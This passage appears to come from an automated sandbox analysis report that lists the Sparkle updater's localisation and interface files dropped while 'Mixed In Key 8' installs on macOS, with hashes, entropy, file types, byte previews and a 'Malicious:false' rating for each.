                                                                                                    Preview: ..".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".%.1.$.@. .%.2.$.@. .i.s. .g.e.d.o.w.n.l.o.a.d. .e.n. .i.s. .k.l.a.a.r. .v.o.o.r. .g.e.b.r.u.i.k.!. .W.i.l.t. .u. .%.1.$.@. .n.u. .i.n.s.t.a.l.l.e.r.e.n. .e.n. .h.e.r.s.t.a.r.t.e.n.?.".;.....".%.1.$.@. .c.a.n.'.t. .b.e. .u.p.d.a.t.e.d. .w.h.e.n. .i.t.'.s. .r.u.n.n.i.n.g. .f.r.o.m. .a. .r.e.a.d.-.o.n.l.y. .v.o.l.u.m.e. .l.i.k.e. .a. .d.i.s.k. .i.m.a.g.e. .o.r. .a.n. .o.p.t.i.c.a.l. .d.r.i.v.e... .M.o.v.e. .%.1.$.@. .t.o. .y.o.u.r. .A.p.p.l.i.c.a.t.i.o.n.s. .f.o.l.d.e.r.,. .r.e.l.a.u.n.c.h. .i.t. .f.r.o.m. .t.h.e.r.e.,. .a.n.d. .t.r.y. .a.g.a.i.n...". .=. .".%.1.$.@. .k.a.n. .n.i.e.t. .w.o.r.d.e.n. .g.e.u.p.d.a.t.e. .a.l.s. .h.e.t. .v.a.n. .e.e.n. .a.l.l.e.e.n.-.l.e.z.e.n. .v.o.l.u.m.e.,. .z.o.a.l.s. .e.e.n. .s.c.h.i.j.f.k.o.p.i.e. .o.f. .C.D.,. .g.e.o.p.e.n.d. .i.s... .V.e.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/nl.lproj/.BC.T_hSK3oV
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):15771
                                                                                                    Entropy (8bit):6.810998861076099
                                                                                                    Encrypted:false
                                                                                                    MD5:3FB595B89656D1C737D48D51D58B82FC
                                                                                                    SHA1:AA2B1BF57CE320B83F129BA6862A092C3099ED24
                                                                                                    SHA-256:E5BC0F31D8349C610DD776C8C40EB8EEE6A508AF76E6134934CA751BFB1A71B1
                                                                                                    SHA-512:8472D1B38560B93E21162DEEA39C2E229D98201C9D5F21676768295FC28EA6CFAC5EB8FC8591842E89BE5323C3EAA54A52EDAEC81D309137DE56A8A1A3A7B1BA
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.G.O.c.l.m.}.~.....................................................................#.&.'./.0.1.2.7.L.S.f.g.h.i.j.k.l.m.n.o.p.q.r.s.t.u.v...w.x.~.........b.............................................................$.*.+.,./.2.5.>.?.G.K.L.U.V.].^.b.w.{...........................................................................................................".#.$.*.2.3.4.:.B.C.D.J.Q.R.S.Z.[.\.v.y.z.|.....r.a......................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys........................ ...!."[NSClassName....]SUUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pl.lproj/.BC.T_CiiwuN
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):15509
                                                                                                    Entropy (8bit):6.794361084474379
                                                                                                    Encrypted:false
                                                                                                    MD5:8F597D46334E60238911D7328F36FDD0
                                                                                                    SHA1:5B3B0756AF4F95AB71134B7F4D41201CF04A98A7
                                                                                                    SHA-256:4EAD5EAD48A626A61CCA695FDF5F49D08E382782C75EC092F48D7C55E8794278
                                                                                                    SHA-512:3E89B11D3614842BB26F247E4969EC2732019141AC62BCA13C2639A4F41E071365E5F0B48243AEA24780E3381DB767913D724A3B11FAF7DF3F2470ACC402EAE7
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.E.M.a.j.k.{.|.....................................................................+.2.E.F.G.H.I.J.K.L.M.N.O.P.Q.R.S.T.U...V.W.].b.f.j.m.n.s................................................................... .#.$.,.-...:.=.>.F.G.H.].a.e.f.h.i.j.p.u.v.{.........................................................................................................'.(.)./.6.7.8.?.@.A.[.^._.a.{...X._..................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys........................ ...!."[NSClassName....]SUUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.D....4.5.6.7.8.9.:.;.<.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pl.lproj/.BC.T_Ijn8ig
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):12192
                                                                                                    Entropy (8bit):6.721769592341197
                                                                                                    Encrypted:false
                                                                                                    MD5:1109B9125C7F6BC071E978AB18488BE6
                                                                                                    SHA1:E024F8B9384B5548F6EB34A8F435CD40F784F93B
                                                                                                    SHA-256:473C18CA21AF8E14457B08645ED436CE7B9AD8D730F10B08914194C21D51FA23
                                                                                                    SHA-512:66213C67E7C61934B68EB1940BAE45B1AFC1B4DCB523CFE16A9191EBCE1DC8310E764727675797BC2FBF7E1B21A9B253E7A4C5EC4DF1E118AED4DC3808C1535C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.=.E.g.h.i.j.k.w..................................................................... .$.'.,.-.2.6.9.B.C.J.O.P.].`.a.b.v.w.{...................................................................................................$.%.&.-.../.D.G.H.J._.}.f.b........................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.........|.............. ...!."[NSClassName...._..SUAutomaticUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...e.h.j.l.s.v.y....>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....c.d....F.G.H.I.J.K.L.M.N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].]._.`.a.b.c.d.W.f\NSWindowRect_..N
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pl.lproj/.BC.T_dUl3d9
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):18313
                                                                                                    Entropy (8bit):6.829794508990958
                                                                                                    Encrypted:false
                                                                                                    MD5:00C4DAF2E1ED8593422860F84352E3FC
                                                                                                    SHA1:07B08064F47E9C4B5F208D94527D9820B53B4471
                                                                                                    SHA-256:C04487D856E42EABB3428F48BA180187FB24C0793215B0628BE74A3192D0B8AC
                                                                                                    SHA-512:21812CF7025031ABD02F3A761691C06370BECD5E98761AF3B57D56E1E4A13267A43B7AFA1F3D4F856E4ADDEF46389679DC4DEC499EF010E5EFDE7AF7F6A4A507
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.E.M.a.j.k.{.|.......................................................................7.=.M.Q.z.{...........................................................................%.&.+.-.0.9.:.A.B.C.D.G.H.M.N.S.s.t.u.v...................................................................................%.+.,.-.0.3.6.7.9.:.;.<.=.@.A.F.G.K.P.Q.V.W.c.d.e.f.m.n.o.r.v.}...............................................x.`.........................................A.t._...e..............................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys............................ ...!."[NSClassName...._..SUUpdatePermissionPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSO
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pl.lproj/.BC.T_ykJSdy
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode C program text, with very long lines
                                                                                                    Size (bytes):7582
                                                                                                    Entropy (8bit):3.5193891216678566
                                                                                                    Encrypted:false
                                                                                                    MD5:9D4CA8C2C26C90F1105B820EE8EF789C
                                                                                                    SHA1:24165533106900CC2B59CC9CF9D804E8AE30BF76
                                                                                                    SHA-256:B7914349272B6432BBBFA03E2B729A0BEB52F1D43BC307C74FF51FADF8CADB9F
                                                                                                    SHA-512:6C941E3498FA620A2134FA034740323889D3CEBA0E69EC2EE93820F09DAF44A149DEBCDEE7C8B8720D2844359D753C90C40C8142E7878C83FF9BD627B9468940
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ../.*. .".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.".;. .*./...".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".%.1.$.@. .%.2.$.@. .z.o.s.t.a.B. .p.o.b.r.a.n.y. .i. .j.e.s.t. .g.o.t.o.w.y. .d.o. .u.|.y.c.i.a.!. .C.z.y. .c.h.c.i.a.B.b.y.[. .t.e.r.a.z. .z.a.i.n.s.t.a.l.o.w.a... .i. .p.o.n.o.w.n.i.e. .u.r.u.c.h.o.m.i... .%.1.$.@.?.".;...../.*. .".%.1.$.@. .c.a.n.'.t. .b.e. .u.p.d.a.t.e.d. .w.h.e.n. .i.t.'.s. .r.u.n.n.i.n.g. .f.r.o.m. .a. .r.e.a.d.-.o.n.l.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_BR.lproj/.BC.T_2XM2fW
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):11205
                                                                                                    Entropy (8bit):6.714746770863015
                                                                                                    Encrypted:false
                                                                                                    MD5:4FBF50B381C4D4201AB66013D825F381
                                                                                                    SHA1:6CC22D0EB590EFCEF7AFA0B4515310C5A1BB42FA
                                                                                                    SHA-256:359079BA8C4D87FC2CE73C3DEC9433AAF4D279ABDC847FE3FCAFD57CDA5AB3FA
                                                                                                    SHA-512:6C37FF4995F40DC0AEEF4000A8A2FBC0203799F6EB75A02F6CE24C9174DD203817DE375A753831E9A2031542B7185BF13F1DD2EC71A9A2F3FFE1F56CB12AACCD
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00..............h.iX$versionX$objectsY$archiverT$top...............#.$.*...2.;.C.].e.h.l.x.y.z.{.|.}.~.........................................................................&.'.0.1.5.6.;.<.A.F.G.I.K.L.Q.n.o.p.q.z.........................................................................4.m.....M.N...O.P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].^._.b.eU$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.....q.o.l...........p.. ...!."[NSClassName...._..SUPasswordPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.:..4.5.6.7.8.9.....7.F.g.j....<.=.>.....@.A.BXNSSource]NSDestinationWNSLabel..........D.E.F.G.H.I.J.K...L.M.N.O.P.Q.R.S.T.U.P.T.X.Y.Z.[.YYNSEnabledWNSFrame_..NSAllowsLogicalLayoutDirectionVNSCell[NSSuperviewXNSvFlagsZNSEditable_..
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_BR.lproj/.BC.T_FM0SJf
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):15740
                                                                                                    Entropy (8bit):6.794400510239076
                                                                                                    Encrypted:false
                                                                                                    MD5:5B93C5C2BCC2392372F32756FF27CA64
                                                                                                    SHA1:67036627DE9A4A1290C74F8142BC2135A3294A36
                                                                                                    SHA-256:E94A4A5AF05E08C5529503D53C7156AEACED93A6B71A8E8632A46BA6E2A14F24
                                                                                                    SHA-512:D15CBB6B6A38FDBADBBEAC91789327B25418129D0F5A323EDB83955E7827F95EAA128D45E66D235FF0C8A1CE4756E139BDB66EB5B4073A813252BE128C5F9D46
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.E.M.a.j.k.{.|.....................................................................+.2.E.F.G.H.I.J.K.L.M.N.O.P.Q.R.S.T.U...V.W.].j.k.l.m.`.o.s.w.z.{...................................................................".-.0.1.9.:.;.G.J.K.S.T.U.j.n.r.s.u.v.w.}.......................................................................................................$.%.&.,.4.5.6.<.C.D.E.L.M.N.h.k.l.n.....e._..................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys........................ ...!."[NSClassName....]SUUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.D....4.5.6.7.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_BR.lproj/.BC.T_WVPN3k
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):18550
                                                                                                    Entropy (8bit):6.781554139332877
                                                                                                    Encrypted:false
                                                                                                    MD5:6DAF9CE560909D4BB817F931D99EBFAD
                                                                                                    SHA1:AB93D93CD37AD73339B4D54CC696B2DFF0B16DC1
                                                                                                    SHA-256:C6539769C0273589B977B40F28FF20166F5ECE7903FFEE7DD09A8C336D199577
                                                                                                    SHA-512:AA7DC14A92D2835BA414531A2DD47B24CBC7FF677964407274B82ED608F5E89013389D7316FE0506EE1A1A7AC782A7256496DE90A021E92EDE9CC6F31C35658F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.E.M.a.j.k.{.|.......................................................................7.=.M.Q.z.{.........................................................................$.%.*.,./.8.9.@.A.B.C.F.G.L.M.R.r.s.t.u...................................................................................$.*.+.,./.2.5.6.8.9.:.;.<.?.@.E.F.J.O.P.U.V.b.c.d.e.l.m.n.q.u.|...............................................x.`.........................................@.s._...e..............................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys............................ ...!."[NSClassName...._..SUUpdatePermissionPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObj
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_BR.lproj/.BC.T_u4FQpE
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):12159
                                                                                                    Entropy (8bit):6.724507402439369
                                                                                                    Encrypted:false
                                                                                                    MD5:C321AE2DE936C4F21B2A8FD8DD6D83B2
                                                                                                    SHA1:D4E8DB0F7D336B4EE4531F11CB8CA1515AEE47AD
                                                                                                    SHA-256:29E553D45D347275E2C58C49A21793CD6F67F23C9AED8845CE69A69C1BAAA2ED
                                                                                                    SHA-512:9C927D27E52578A1E6BEBF8E0069F62641D4AB0A6284AE0F51C1F20B2076D6491182A9FE1819C6A12B6A63F2AB2488EF226EB1BAB0AD0977E4F643E316E87092
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.=.E.g.h.i.j.k.w..................................................................... .$.'.,.-.2.6.9.B.C.J.O.P.].`.a.b.v.w.{...................................................................................................$.%.&.-.../.D.G.H.J._.}.f.b........................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.........|.............. ...!."[NSClassName...._..SUAutomaticUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...e.h.j.l.s.v.y....>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....c.d....F.G.H.I.J.K.L.M.N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].]._.`.a.b.c.d.W.f\NSWindowRect_..N
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_BR.lproj/.BC.T_wQ0hwz
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode English text, with very long lines
                                                                                                    Size (bytes):6380
                                                                                                    Entropy (8bit):3.431111657261911
                                                                                                    Encrypted:false
                                                                                                    MD5:7F5E6A38D91CBC6CEB79F865CDAC26AE
                                                                                                    SHA1:9B4FF3D04EC5C8A851F3C01113B92BC6505D7481
                                                                                                    SHA-256:EF4DABADC5B64C200A29275A0CBA77E4D35D663DE49F2A32133AFC6D590314A4
                                                                                                    SHA-512:A9B6703A27AE0358A9F87FB9F16F99943542EB64F3F1333583472BF7E91F6531D3BC054781DA369A33C6F87B9832F91012764F3C5A8CC4D5F7AA15552987B61B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".%.1.$.@. .%.2.$.@. .f.o.i. .b.a.i.x.a.d.o. .e. .e.s.t... .p.r.o.n.t.o. .p.a.r.a. .u.s.o.!. .G.o.s.t.a.r.i.a. .d.e. .i.n.s.t.a.l.a.r. .e. .r.e.i.n.i.c.i.a.r. .o. .%.1.$.@. .a.g.o.r.a.?.".;.....".%.1.$.@. .c.a.n.'.t. .b.e. .u.p.d.a.t.e.d. .w.h.e.n. .i.t.'.s. .r.u.n.n.i.n.g. .f.r.o.m. .a. .r.e.a.d.-.o.n.l.y. .v.o.l.u.m.e. .l.i.k.e. .a. .d.i.s.k. .i.m.a.g.e. .o.r. .a.n. .o.p.t.i.c.a.l. .d.r.i.v.e... .M.o.v.e. .%.1.$.@. .t.o. .y.o.u.r. .A.p.p.l.i.c.a.t.i.o.n.s. .f.o.l.d.e.r.,. .r.e.l.a.u.n.c.h. .i.t. .f.r.o.m. .t.h.e.r.e.,. .a.n.d. .t.r.y. .a.g.a.i.n...". .=. .".%.1.$.@. .n...o. .p.o.d.e. .s.e.r. .a.t.u.a.l.i.z.a.d.o. .e.n.q.u.a.n.t.o. .f.o.r. .e.x.e.c.u.t.a.d.o. .a. .p.a.r.t.i.r. .d.e. .u.m. .v.o.l.u.m.e. .s.o.m.e.n.t.e. .d.e. .l.e.i.t.u.r.a.,. .c.o.m.o. .u.m.a. .i.m.a.g.e.m.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_PT.lproj/.BC.T_2ldMBX
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):15929
                                                                                                    Entropy (8bit):6.773954987143327
                                                                                                    Encrypted:false
                                                                                                    MD5:92F49494404B520461E01AD083F4BE8D
                                                                                                    SHA1:533BDBDCED059078E165626BFC196EE5B370C56F
                                                                                                    SHA-256:02C5CA9C182A43C235F89AD585B99AFA628E68F57DAAAA6C95E91E7D5D5F22CB
                                                                                                    SHA-512:846F89A0688F9E8B85085D1F03B552CDB1B6A7E32F630DEA339C65FE55888ECEAFF72C6EEF1A7A4787C3615320F83619BDFF4684C585B3B37342A1EA3F897C6A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.G.O.c.l.m.}.~.....................................................................#.&.'./.0.1.2.7.L.S.f.g.h.i.j.k.l.m.n.o.p.q.r.s.t.u.v...w.x.~.........b.............................................................$.*.+.,./.2.5.?.@.H.L.M.V.W.^._.c.x.|...........................................................................................................".#.$.*.2.3.4.:.B.C.D.J.Q.R.S.Z.[.\.v.y.z.|.....s.a......................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys........................ ...!."[NSClassName....]SUUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_PT.lproj/.BC.T_55J9V0
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):12175
                                                                                                    Entropy (8bit):6.719807080046224
                                                                                                    Encrypted:false
                                                                                                    MD5:CAC1492EC2FD38D882CB50370098E0D0
                                                                                                    SHA1:4C7001089459FB36FA1285FCD6E73282AA947C4B
                                                                                                    SHA-256:B468C1700F47B311C9E37C627C154AFC1CCF82A95ACE2161FEA81538E3BC232A
                                                                                                    SHA-512:0D3DCB8F4B52C38BE9A1767DD3AA93E2934BF2110C807B715A772165A7817E064CFF573974B216498010E5590DE2BEE3918B48DA3A37F89C5BB859C078210E63
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.=.E.g.h.i.j.k.w..................................................................... .$.'.,.-.2.6.9.B.C.J.O.P.].`.a.b.v.w.{...................................................................................................$.%.&.-.../.D.G.H.J._.}.f.b........................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.........|.............. ...!."[NSClassName...._..SUAutomaticUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...e.h.j.l.s.v.y....>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....c.d....F.G.H.I.J.K.L.M.N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].]._.`.a.b.c.d.W.f\NSWindowRect_..N
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_PT.lproj/.BC.T_KAkpKu
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode English text, with very long lines
                                                                                                    Size (bytes):6702
                                                                                                    Entropy (8bit):3.4004754417747143
                                                                                                    Encrypted:false
                                                                                                    MD5:7544C7D52E0976AD3DFED89FAF6C4498
                                                                                                    SHA1:5A76559B637540B912285117AE80F15B041A11A2
                                                                                                    SHA-256:D5FC52E6F043BFE41F2318ED75FAF053A11839AD751484D9525CC9A4F0F23F7F
                                                                                                    SHA-512:EA43FDE854CD332935818DE378F11CD1C1F60404C1A6F0C03A85C4910BE9D756D555578567294F6447954D6B2076F4C6E38CF4A521DA87BE188FCEF4AF1BA4F5
                                                                                                    Malicious:false
                                                                                                    Reputation:low
